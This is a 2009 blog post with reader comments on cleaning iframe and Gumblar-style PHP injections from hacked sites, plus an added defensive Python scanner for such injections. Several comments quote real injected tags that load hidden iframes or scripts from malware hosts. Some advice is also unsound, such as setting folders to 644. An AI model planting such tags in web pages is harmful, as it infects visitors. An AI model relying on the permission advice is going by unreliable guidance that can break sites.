Thursday, May 7, 2009

Remove malware, iframe.inf virus from your website

Hi Developers,
For the past few months you have probably been pulling your hair out trying to remove malware from your site. I too suffered a lot with this, and I have now learnt from it how to safeguard our websites from these hackers.

The iframe virus redirects visitors to a Chinese domain that is heavily infected with malware, which can lead to theft of secured data from your system. If you don't take care of this virus, it will eat your whole site.

How to Remove Iframe virus?
The iframe tags are written just below the body tag. Follow these steps to remove the virus.
1. Log in to your FTP & edit the file which contains the iframe tag.

2. Look for the iframe tag just below the Body or Head tag.

3. Remove the code & overwrite the file.

4. Now right click the file, click properties/File attributes and set it to "444", so that no hacker has the privilege to write the iframe code to the file.

5. Once you've cleaned this, the other type of virus will slowly arise: it searches for the files that are included in the index.php file (i.e. dbconnect.php, general.php, configure.php, common.php, functions.php, classes.php etc.) and writes PHP code at the top of each of them, which dynamically writes JavaScript code when the file is executed in the web browser. The script redirects the page to gumblar.cn/rss?id=2

6. To remove this type of infection, look carefully into the above-mentioned files; you can easily find the PHP code at the top of the page. Just remove the code and make sure the file is write protected, so that the PHP code won't be written again.

7. If you still can't find the solution, just comment on this post. I'll reply ASAP.
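The checks from steps 2 to 6, as an added example that is not part of the original post: a Python scanner that flags an external iframe placed directly after the body or head tag, a hidden iframe, PHP with `eval`/`base64_decode` on the first line of a file, and files that are not yet set to 444. The regexes, the finding labels and the sample site (constructed in a temporary directory, with placeholder domains) are assumptions made for illustration, not malware signatures; the first-line `eval` heuristic follows what commenters on this page report.

```python
import os
import re
import shutil
import stat
import tempfile

# Heuristics (assumptions drawn from the symptoms on this page, not signatures).
AFTER_TAG = re.compile(
    r'<(?:body|head)\b[^>]*>\s*<iframe\b[^>]*\bsrc\s*=\s*["\']?https?://', re.I)
HIDDEN = re.compile(
    r'<iframe\b[^>]*(?:visibility\s*:\s*hidden|display\s*:\s*none)', re.I)
PHP_TOP = re.compile(r'^\s*<\?php\b.*\b(?:eval|base64_decode)\s*\(', re.I)
WEB_EXTS = (".php", ".inc", ".html", ".htm")


def scan_file(path):
    """Return the list of finding labels for one file."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    findings = []
    if AFTER_TAG.search(text):
        findings.append("iframe-after-body-or-head")
    if HIDDEN.search(text):
        findings.append("hidden-iframe")
    first_line = text.split("\n", 1)[0]
    if path.lower().endswith((".php", ".inc")) and PHP_TOP.search(first_line):
        findings.append("php-eval-on-first-line")
    # Any write bit set means the file is not at the 444 the post recommends.
    if stat.S_IMODE(os.stat(path).st_mode) & 0o222:
        findings.append("writable")
    return findings


def scan_tree(root):
    """Walk a web root; map relative path -> findings (files with none are omitted)."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(WEB_EXTS):
                full = os.path.join(dirpath, name)
                found = scan_file(full)
                if found:
                    report[os.path.relpath(full, root)] = found
    return report


def infected(report):
    """Paths with an injection finding, i.e. more than just 'writable'."""
    return sorted(p for p, f in report.items() if set(f) - {"writable"})


def build_sample_site():
    """Constructed sample tree: two injected files, two clean ones."""
    root = tempfile.mkdtemp(prefix="iframe-scan-")
    bad = ('<iframe src="http://malicious.example:8080/index.php" width=109 '
           'height=147 style="visibility: hidden"></iframe>')
    samples = {
        "index.php": (0o644, "<html>\n<body>\n" + bad +
                      "\n<?php include 'dbconnect.php'; ?>\n</body>\n</html>\n"),
        # The payload decodes to a harmless "echo 1;" (constructed).
        "dbconnect.php": (0o644, "<?php eval(base64_decode('ZWNobyAxOw==')); ?>"
                          "<?php\n$db = 'demo';\n"),
        "functions.php": (0o444, "<?php\nfunction add($a, $b) { return $a + $b; }\n"),
        # A legitimate, visible iframe lower in the page must not be flagged.
        "about.html": (0o644, '<html>\n<body>\n<h1>About</h1>\n<iframe src='
                       '"https://maps.example/embed" width="600"></iframe>\n'
                       "</body>\n</html>\n"),
    }
    for name, (mode, body) in samples.items():
        path = os.path.join(root, name)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for rel, labels in sorted(scan_tree(site).items()):
        print(rel, labels)
    shutil.rmtree(site)
```

The `writable` label only reports mode bits; as commenters on this page note, the injection keeps returning until the FTP password is changed from a clean machine.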


Update:
Godaddy hosting had some security issues with the WordPress which they have installed. Please upgrade all your WordPress installs under Godaddy hosting (older WordPress versions have a security hole through which malicious code is injected into all the PHP files). For further information regarding the virus removal, please send a mail to smart2raise@gmail.com

116 comments:

Leela ram said...

After cleaning the virus in my site it comes again after a week or two..

What might be the problem.. i changed all the folder permission to 755

Sathish Kumar said...

Set permissions for files only. Set it to 444, not 755.

Raza said...

Hi Satish,

I own a Windows hosting server and am facing the same iframe injection and gumblar issue very seriously. I have about 70 websites hosted on the web server, and this problem is arising on an almost daily basis and affecting thousands of files.
Every time I have to edit and remove the virus from all the files, but the problem is still there.
My data center guys are also not able to fix this issue properly.
It would be highly appreciated if you could help me with this issue.

Thanx,
Raza

Taufeeq said...

Mr Satish!
My website www.UFDpoint.com has an issue like that. When we open it in Google Chrome it gives the message "Malware detected, if you open this site, it will harm your computer". Kindly tell me the solution to this problem.
I hope you can do it .
by
Taufeeq

Sathish Kumar said...

Hi Taufeeq,
If you're sure that your site is not affected, or you've cleaned your site, then make a request in Google Webmaster. They will review your site and make it available after their review is completed, but it will take at least 2 days for them.

Taufeeq said...

hi Frndz
if you can solve my problem.please, send me email on mailtaufeeq@gmail.com
i will wait your response

celina lucille said...

hi guys

Please can you help my website has been hacked it has some malware virus please email on how I can remove it contactus@sawebs.co.za

Satvinder said...

Hi Satish,

I think iframe issue is getting common with every 3rd website. I also faced the similar issue in most of the websites developed by us. The solution which you have given is appropriate but tell me if it is a dynamic site and I cannot give the permission of 444 as it is a CMS driven website what is the alternative as I keep removing the iframe code but it appears again in few days.
Thanks in advance.
Satty

Sathish Kumar said...

Hi Satvinder,
It will be easier when you're doing it for a dynamic site. The major files which will be affected are "index.php, dbconnect.php, functions.php, classes.php", and the malware will read which files are included in the index.php file and will put PHP scripts in the included files as well. So setting the index.php file, and the other files included in index.php, to read-only (444 permission) will be enough.

Alvin said...

When I set it to 444, I received the message "Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request..."

can anyone explain this

Sathish Kumar said...

Hi Alvin,
Did you set 444 permission only for files, or for both files & folders? If you set 444 for files, then there will be no issue with a 404 error (page not found).

Daniel Kim said...

Thank you Sathish for your post. It's been a great help for me to understand what was going on. I had this problem with one of the sites of my company. Are there any solutions for when the website can only function at a set of particular permission settings? Some of the files are required to be 755, 644, 707 etc. Any help would be greatly appreciated.

Thanks

KaKaDino said...

My Company websites also have this problem.

Actually, I would like to know where the virus comes from. The web hosting server? The developer's local computer?

Thanks!

Nandla said...

I'm facing the same problem, and Google has emailed me that the search result of my site will include "this site may harm you". I've applied all the methods but.....
My site is www.pkfunda.com
Now what to do? Please help.

ferdie san luis said...

Hi guys, before removing the iframe in your site, clean your PC first. Scan it with an anti-virus. If it's all clean, CHANGE YOUR FTP ACCOUNT PASSWORD. This is very important before removing the iframe. If you don't clean your PC and change your FTP account password, it will keep coming back.

Vizzkid said...

Hi,
I would like to contact you regarding the freelancing of PHP work and other allied work... Kindly send me your contact details...
thx
Vishal Modi.
ProconIT
CHENNAI.

Sathish Kumar said...

Hi Vishal,
My contact details are as follows:
Gmail: smart2raise@gmail.com
Yahoo: smart2raise@yahoo.co.in

Roman said...

I set 444 on my index.php file. For a few days index.php was running without the iframe. But now the iframe is inserted in the file again. What is the complete solution to this problem? Please write to me ASAP.

Roman

Sathish Kumar said...

Hi Roman,
Have you changed your FTP password after removing the iframe?

SaschArt said...

Clean Web Site at http://soft.saschart.com/index.php#Clean%20Web%20Site can help anybody

Biju Mathew said...

Hi,

All my websites are affected by this iframe virus. The following is the iframe code.

Site-1

iframe src="http://u1a.ru:8080/index.php" width=109 height=147 style="visibility: hidden"/

site-2

iframe src="http://a5g.ru:8080/ts/in.cgi?pepsi95" width=125 height=125 style="visibility: hidden"/iframe


I really don't know how to remove this code. I have a website which has 45000 pages. All the files are corrupted with this malware.

please help me.

Doc Janov said...

Having the same problems as you, I found this tool on the web, which seems to be very powerful in cleaning this sh**
It's able to search and replace text in a whole directory.
So just let it search for the bad code and replace it with nothing.
Be sure to change and protect your system after this.

http://www.inforapid.de/html/suchenersetzen.htm

cryss1988.gmail.com said...

Biju Mathew i`m having the same problem as you do, how can i get rid of that .... ????

tanyasilvano said...

Please help! I do not know that much at all about this virus that has attacked my business web site. I have contacted my host and they are saying that it must be something in my script. I designed my website in Microsoft publisher; and I checked the pages and my computer for viruses but nothing shows. However every time a customer logs in to my website it says are you sure you want to open this site it contains Exploit software that says Exploit:Win32/Pdfjsc.AV and the alert level is severe. Can anyone help me please???? My customers are getting pretty upset and I don't know how to fix it. Thanks

Sathish Kumar said...

Hi tanyasilvano,
If you need to remove virus from your site you can contact me through smart2raise@gmail.com. I assure that next time the virus would not affect your website

Conor Treacy said...

Just so it's clear, this is NOT a VIRUS! This is an exploit of the site, and using Virus Scanners or calling it a Virus is incorrect. These are exploits of files.

Setting to 444 will work, provided your program does not need to write to the file.

tanyasilvano said...

How and what do I set to 444? This was the first website that I designed so I do not know too much. Thanks for your help, I appreciate it.

manohar said...

I removed the iframe in the HTML and changed the file permissions to 444, but when I searched for my website in Google, it is showing "This site may harm your computer."

PLEASE ANY ONE HELP ME ON THIS

Sathish Kumar said...

Hi Manohar,
You need to request a review in Google, so that Google will crawl your site to check that the site is not affected by the virus & then it will remove the warning message. You need to add your site in Google Webmaster to verify the site.

manohar said...

Hi Satish,

I reviewed the website named STOPBADWARE.org, but I am not able to submit a review report to that website.

I don't have much knowledge of Google Webmaster. Can you give me the URL where I can submit my report?

Panos said...

I have the same iframer virus and I cannot do anything. First I deleted all the FTP files and uploaded new ones. Then I ran all the major antivirus programs (Avg, Symantec, Spybot, Ad-Aware) and no virus was found in my system. I changed all the FTP and CP passwords and after 2 days the iframer came up again.. I changed my passwords again, and today again...

Is there anyone who can help me..I dont know what more to do, my hosting company says there is not any infection on the server..

Sathish Kumar said...

Manohar, it's a bit of a long process to submit to Google Webmaster. I am able to rectify the virus. Please contact me.

palizaa said...

Hello !!
I have changed the file permission to 444 but it automatically goes back to 644. How does that happen?

I'm already pissed off removing this iframe. Please assist..

Sathish said...

Hi Palizaa,
If you need any further assistance which in my blog doesn't help, feel free to contact my mail-id:smart2raise@gmail.com

sbee said...

Guys, change your FTP password and never access this FTP account from an infected machine.. try to use Linux or Mac for cleaning.

This virus gets FTP information from the affected Windows system.

Anonymous said...

here is my website...
http://www.e2pages.com/en
u knw hoe to fix it?
i try n try in internet but still cant..i hv not ideo at all...
Hope u can help...N thanks you so much..

Sathish Kumar said...

For fixing issue in http://www.e2pages.com/en. Please post ur contact details.

MLM Player said...

Dear Friend,
I have a real estate website. Some time ago I was facing some string error, but it was solved when I set its code to '444'. But now a new problem has come up: when I log out from the FTP software, my index file's attribute automatically changes from '444' to '644' & it becomes affected again. Please guide me.
Thanks a lot
Nikhilesh Singh Naruka

beheader said...

my code won't set on 444, nor 040, but 644 on ftp.What do I do?

Sathish Kumar said...

Hi Beheader,
You need to set 444 for files alone not for folders. For folders you can set to 644.

Website Design said...

Thank you for the info. Your suggestion helped me a lot.

Sathish said...

You're welcome

bhav said...

Its working gr8 on php files...thanks

but what do we do if our site is in asp.net - windows server - it does not allow to change permissions ???

please advice.

Sathish said...

Hi Bhav,
Thanks for your feedback. If you're using windows server then you need to give file permission from file manager in control panel.

Atul said...

How do we check it on a Windows server where the asp.net files are?
As in PHP, this malware sometimes creates a .php file in writable folders, but on a Windows server what do we check?

Also, in Windows we cannot give 444 permission.

Sathish said...

Hi Atul,
you can give 444 permission in control panel. If you're using Plesk, then you need give write,read permission only to admin & not even for ftp users

Mukesh said...

Hi Satish,
A few days ago I changed my file permissions and made the files read-only (444), but today I checked and those files have got the write permission (644) again automatically.

do you know why it happens and how to get rid from it?

Sathish said...

hi Mukesh,
How did you give the file permission? Through FTP or through the Control Panel? If you gave it through FTP, some servers don't accept that.

Mukesh said...

i did it from ftp but that time it shows that file permissions are changed.

Sathish said...

Try it from control panel this time

Jasontor said...

How exactly do I get it off of my computer?

Mukesh said...

You can use Avira Anti virus.

Anonymous said...

Thanks for this blog. I was not able to solve that problem, and from this blog's idea I changed the permission to 444. Now I have a solution for that, thanks only to Sathish Kumar, and thanks to all.

Nitin Vyas said...

Hi satish
Is there a way we can get rid of this iframe thing in Joomla without having to touch the database?

Nitin

Sathish said...

Hi Nitin,
As long as the virus has not affected the database, we can clean Joomla sites without affecting it. You need to make sure that all the images & templates are backed up.

Atul said...

Thanks Satish .
But We have a websites hosted on Windows server which are in ASP.NET .
on regular basis our sites get infected with Malware attacks like IFRAME Malware . Also sometimes these Malwares just eat of the codes on the pages .

I have read about these but they are mostly in Linux server with PHP websites . As I had seen here sometimes they keep php files and htaccess in writable folders also .

Can you advice what and how to clean them on windows server .

Also in Windows you do not have 444 permission. We had only given IUSER Full rights permissions to the folders where we are doing File Uploads from the codes .

php puli said...

My web site is a news portal with joomla.can i make the whole folder write protected?
http://relaxguru.blogspot.com

Sathish said...

Hi PHP Puli,
If you set 444 permission for whole site then nothing will be displayed in the webpage. Go for a try :)

SYED MUHAMMAD FAIZAN said...

hello,

My website is http://www.funxperts.com
I have removed the iframes and checked for other malicious code where I know to look, but I don't know what "444" is about.
plz help me
my ID is
faizan_baba007@yahoo.com

Anonymous said...

I am gettin the same problem with Iframe,


When I view source of the page I can see the iframe link


I hve a lot of .php in the ftp space but dont know how to edit them

plz help

mymymy@tesco.net

Naveen Malik said...

I am setting permission to 444 but after completing it is back to 644 why this is happening ???

Sathish said...

Hi Naveen,
Whats your server? Linux or Windows? If Windows means, it wont understand the file permission which you given through ftp. So you need to do it from Control Panel.

Desi Town said...

hi,
I have a WordPress blog and it is affected by the iframe virus. When I remove the iframe virus, my blog gets affected by a JavaScript virus. Can you help me remove the virus from my blog?
and my all site effect
my site url www.desitown.info

Sathish said...

Hi Desi Town,
Please give your mail-id or you can contact me @ smart2raise@gmail.com. I'll help you

Idris said...

Hi Sathish,

One of my Client site is affected by so many malwares, like Iframe,CRYPT script and eval=base64(),also there was folders called .xdata, .xtop, .xhot containing lot of html files in the public_html directory.

I have removed all script and tags from the files and also the malware folders but still the site is down and shows malware warning in the browser and it still

I can't even log in to the cPanel account of that website.

Can you please tell me what was the issue and how to find root cause of this malware.

Sathish said...

Hi Idris,
Please send your contact info. I'll help you

Idris said...

Hi,

Here is my email address

noesys.test8@gmail.com

Ady said...

Hi,

I am having a script virus in my website and it's still there.
I removed the whole site from the server and uploaded the whole site again, but it is still showing the script.

Can anyone help me to sort out this thing.

Ady

Sathish said...

Hi Ady,
I'll help you. Please post your contact info or send mail to smart2raise@gmail.com

prady said...

Hi Satish,

Thanks for your wonderful post. I have this exploit on a blog. When I do a view source I can see the JavaScript added, but when I look at the WordPress index page I can find the iframe code.
http://www.ellensuazo.com/ellensuazo/blog/

Not sure how I can find that piece of code. Also, running Norton does not detect the exploit. Is there any other AV you would recommend to catch this on my local system?

Thanks
pradkris[at]gmail[dot]com

prady said...

i meant that i cant find the iframe code. Sorry for the typo with reference to my previous post

Md Mostafizur Rahman said...

My site www.probashibarta.com has been attacked by malware. I have already cleaned all the iframe code and related files and changed all file & folder permissions to 444, but it is still showing this warning. Please help me............

Sathish said...

Hi Rahman,
Please mail me the details to smart2raise@gmail.com. I'll help you out. Cleaned more than 50 websites & got good results.

ALTAF HUSSAIN said...

I also have the same problem, dear. I have a virus called trenz.pl; it shows an iframe at the end of any page, whether I opened it or not. Just tell me the correct way to remove this, because I have a lot of projects to make in HTML and PHP, but I'm not able to make them because the virus is shown and people don't accept it, so please tell me the solution. It also shows like this in c windows/system32/drivers/etc/hosts/: when I open it, the first line written is

127.0.0.1 trenz.pl/cr something like that, and all my files are infected with this iframe, so tell me by tomorrow, because I have to submit my project on Saturday. Please help, dear, otherwise job problems will be created for me.....

Sathish Kumar said...

Hi Altaf,
Please send your details to my mail. I'll help you

Arief said...

I have problem same with Altaf.
My web is aljamaahnet.com
Please advise me...
Thanks in advance

Sathish Kumar said...

Hi Arief,
Please brief your details through my mail: smart2raise@gmail.com..i'll assist you

admin said...

hello dear sir,
thanks for your valuable post.
I have a website, www.urjaghar.com, which is giving the same type of warning and I am helpless.. Can you please guide me on how to remove the warning message from the website? It's also appearing in Google search results.
thanks
anshuman chandel
info@urjaghar.com

Justyna said...

Sathish,

thanks for your valuable post and finding the time to reply to all these comments, where you give advice as well. Thank you also a lot for your consultation with me through email. You saved me a lot of stress:)

Greetings
Justyna

Shishupal said...

my website address is justtfind.com i found the error only in Google Chrome and in other browsers it is running good so pls help me to solve this error

Sathish said...

Hi Shishupal,
Pls send the details to the above mail id. I'll help you

KEVIN ENTERPRISES PVT. LTD. said...

Hello Mr Satish!
My website www.kevincpp.com has an issue like that. When we open it in Mozilla Firefox or Internet Explorer it gives the message "Reported Attack page, This web page at kevincpp.com has been reported as an attack page and has been blocked based on your security preferences." Kindly tell me the solution to this problem.

Sathish said...

Hi Kevin Enterprises,
I saw your site. Please send ur contact information to my e-mail: smart2raise@gmail.com

Eddy said...

Hello Mr Satish,

My website is also showing virus warnings. I have asked my web design company to remove them but it seems like the virus keeps coming back. There are different warning from different computers here are 3 examples of warnings I get.

- The website contains elements from the site reachsaw.ru, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.

- Trojan Horse Blocked
JS:Illredir-AQ[Trj]

- JS_KEMPAR.SM

Can you please help me find a solution to these problems.

Sathish said...

Hi Eddy,
Please send me ur details to my mail-id, i'll help you

prady said...

Hi Satish,

I have the site of a client of mine
http://www.ellensuazo.com/blog/
I tried searching for the code in the theme but I am really not able to find out where the iframe code is.

Could you help me ?

Sathish said...

Hi Prady,
Send me ur contact details to my mail-id

prady said...

Hi Satish,

I sent you an email at smart######@gmail.com. Could you confirm if you received it.

Thanks
Prady

cmcrci said...

hi,

We are maintaining a web server which is a CentOS machine, and it was infected with this iframe virus just yesterday. There are nearly 20-30 projects, which comprise 7k PHP files.

Is there any code to remove this iframe from all the PHP files at one time?

Previously, the code for cleaner or clean.php was not working.

Plz send me the reply ASAP


My clients are very frustrated with this

Sathish said...

Hi CMCRCI,
First of all, please don't trust the automatic virus cleaner script. It is the fastest method, but the script will not guarantee that all the virus code has been cleared. I'm doing manual cleaning & I have satisfied more than 40 clients. They don't have the problem any more. If you're interested, send your contact information to my mail-id: smart2raise@gmail.com

seo tutorial said...

I have a large website. It's not easy to remove virus from individual pages. If there any bulk removal process. the process which you had mentioned is good and working. If you suggest me some good tools. I will be very thankful to you.
seo tutorial

Sathish Kumar said...

@ seo tutorial: There are many tools to remove the virus, but it's risky to let them handle the files. The file may get corrupted (incomplete code). Malicious code can be of any type: some may be an eval() function in PHP, some may be script tags & some may be an iframe.. so if we do it manually once, it will be better for safeguarding our site. I cleaned manually; maybe sometimes we would miss some page, but it is much more efficient than the tool.

micro said...

Hello,

I am a web developer and have made many websites, but now I am getting a malware error and Google has blocked my site for this. Can you tell me how I can solve this? The same gumblar.cn/rss?id=2 is showing on my website. Please tell me the solution.


Thanks

Anonymous said...

how do i set my website thing to 444 everyone is saying that is the answer but how do i do that??
my site is www.nwephotography.com
and i have been having some issues with google saying its iframes are the problem!! please help!

Sathish said...

To set 444 permission, go to your FTP Program, login with ftp details & right click on the file & click properties & set 444 permission

Anonymous said...

my blog has been attacked by malware because google chrome keep displaying "malware detected.This site may harm to your computer".
please help me with this.
myy blog url facingdlife.blogspot.com

Sathish said...

Hi,
Is the blogspot is owned by you?. Because only if you paid to google, they will give the blogspot with ftp details.

Anonymous said...

where can i download this virus

dskanth said...

My site got infected with an iframe virus called baaswer.com, that iam not able to find in my code. I think my domain is infected with that virus, so iam not able to track it.

Santosh said...

I have a site designed at home and soon I am going to host it... but when I activate my antivirus, my index.php file and many files of that type are not accessible... it says Access Denied... yes, and that iframe virus.. I tried to keep it at 444 but it can't be edited... Right now I can see A there.. how do I edit that? Please help me... I have to deactivate my antivirus in order to run or edit my site.... I know after hosting it will show as a site containing a virus, please help me....

David Kroodsma said...

Hi - I have an unwanted iframe call in my index.php file (right after the body tag), and I have searched my code, reuploaded, and I still can't find the malicious file. How is this file being rewritten?

Sathish said...

Hi David,
Check for eval code either in php file or javascript file

Ajay Dhar said...

Thanks Sathish Sir, I also found it beneficial

Hotrel said...

I don't even know how to find where the iframe tag is. Where do I have to search for it? Please help, because I'm losing all the traffic!

Sathish said...

Hi Hotrel,
Please send your details to smart2raise@gmail.com, i'll assist you.

Fair said...

My website is www.f-h.co, I am having issues with Malware. My index.php files are infected. The error is - Warning: Cannot modify header information - headers already sent by (output started at /home/content/f/a/i/fair5375/html/fairhealth/index.php(1) : eval()'d code:37) in /home/content/f/a/i/fair5375/html/fairhealth/wp-includes/pluggable.php on line 934. I have found the index.php files and I remove the coding but it comes back, I am new to this, and I do not want to lose my content. How can remove the malware?

raj said...

we have a website indianbookshop.co.in Which is developed in .net (.aspx pages). For last few months we are facing malware problem. After ending of our control the "html tag >> then body tag >> then some javascript is inserted in this page ... as per given below.
------------------------


html>body>script type="text/javascript"

src="http://arciaunamu.lt/jstools.js">/script>/body></html

--------------------------

Its showing error & malware problem. We also changed ftp permission to 444, delete & reset all ftp passwords. But still after 13-14 days error again come on website. Its very disappointing, Please suggest something...

Sathish Kumar said...

@Raj,
Kindly send the details to smart2raise@gmail.com

madhu said...

Hey, I am Madhu.
I am familiar with PHP in English,
but now I want to create my web page differently, using multiple languages. If anyone can help with this,


can u give me replies throw this mail punnamadhu98@yahoo.com

Abhishek Mishra said...

Hi, I am abhishek Mishra
Thanks man your suggestion solve my problem

Twinkle Star said...

hello sir,

i have blog www.http://southindiamovies.blogspot.com, suddenly attacked malware virus. i dont know how to remove this.
kindly assist and guide me to remove that malware.

Please Reply : www.successk19@gmail.com

Sameer Srivastava said...

hello,
i am sameer and i have a website www.chaahatintl.com . i didn;t built it all myself nor i have have any knowledge about it. i wanted to delete every stuffs from my website but the data was not deleting and my has a virus too...
please help
mail me at chaahatint@gmail.com ASAP
